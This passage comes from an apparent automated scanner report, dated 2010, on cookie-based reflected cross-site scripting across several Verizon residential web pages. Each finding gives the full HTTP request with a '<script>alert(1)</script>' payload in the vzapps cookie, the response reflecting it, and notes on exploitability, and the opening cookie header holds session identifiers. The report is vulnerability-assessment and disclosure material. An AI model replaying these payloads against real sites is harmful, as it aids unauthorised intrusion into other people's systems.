Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX16bd1'><script>alert(1)</script>1c358468da2; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74937
Expires: Sat, 20 Nov 2010 03:14:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:14:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX16bd1'><script>alert(1)</script>1c358468da2; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX16BD1'><SCRIPT>ALERT(1)</SCRIPT>1C358468DA2 ' />
...[SNIP]...

3.219. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9fca0<script>alert(1)</script>ac910a19ffb was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9fca0<script>alert(1)</script>ac910a19ffb; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74933
Expires: Sat, 20 Nov 2010 00:13:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX9fca0<script>alert(1)</script>ac910a19ffb; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9FCA0<SCRIPT>ALERT(1)</SCRIPT>AC910A19FFB </DIV>
...[SNIP]...

3.220. http://www22.verizon.com/Residential/HighSpeedInternet/Value/Value.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighSpeedInternet/Value/Value.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload af68f'><script>alert(1)</script>63ed67becf9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighSpeedInternet/Value/Value.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf68f'><script>alert(1)</script>63ed67becf9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74936
Expires: Sat, 20 Nov 2010 00:13:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXaf68f'><script>alert(1)</script>63ed67becf9; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: About High Speed Internet
</title><meta name="Keywords" description="reliability, low price, free content, free email
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXAF68F'><SCRIPT>ALERT(1)</SCRIPT>63ED67BECF9 ' />
...[SNIP]...

3.221. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8b391<script>alert(1)</script>ee2a020046a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8b391<script>alert(1)</script>ee2a020046a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104004
Expires: Sat, 20 Nov 2010 00:10:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:14 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8b391<script>alert(1)</script>ee2a020046a; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8B391<SCRIPT>ALERT(1)</SCRIPT>EE2A020046A </DIV>
...[SNIP]...

3.222. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104007
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4DBAA'><SCRIPT>ALERT(1)</SCRIPT>F9EC6948BD6 ' />
...[SNIP]...

3.223. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199728
Expires: Sat, 20 Nov 2010 00:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5BE15'><SCRIPT>ALERT(1)</SCRIPT>3C4E8EB8B2A ' />
...[SNIP]...

3.224. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 1817e<script>alert(1)</script>dabad9477e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX1817e<script>alert(1)</script>dabad9477e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201232
Expires: Sat, 20 Nov 2010 00:09:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:54 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX1817E<SCRIPT>ALERT(1)</SCRIPT>DABAD9477E </DIV>
...[SNIP]...

3.225. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199734
Expires: Sat, 20 Nov 2010 00:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8C400'><SCRIPT>ALERT(1)</SCRIPT>5E2533E5388 ' />
...[SNIP]...

3.226. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload abbca<script>alert(1)</script>27fec1e0170 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXabbca<script>alert(1)</script>27fec1e0170; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 201240
Expires: Sat, 20 Nov 2010 00:11:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:08 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:08 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXABBCA<SCRIPT>ALERT(1)</SCRIPT>27FEC1E0170 </DIV>
...[SNIP]...

3.227. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 33cf3<script>alert(1)</script>f0cf15e82f9 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX33cf3<script>alert(1)</script>f0cf15e82f9; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 308864
Expires: Sat, 20 Nov 2010 00:12:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:55 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=TX33cf3<script>alert(1)</script>f0cf15e82f9; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:55 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
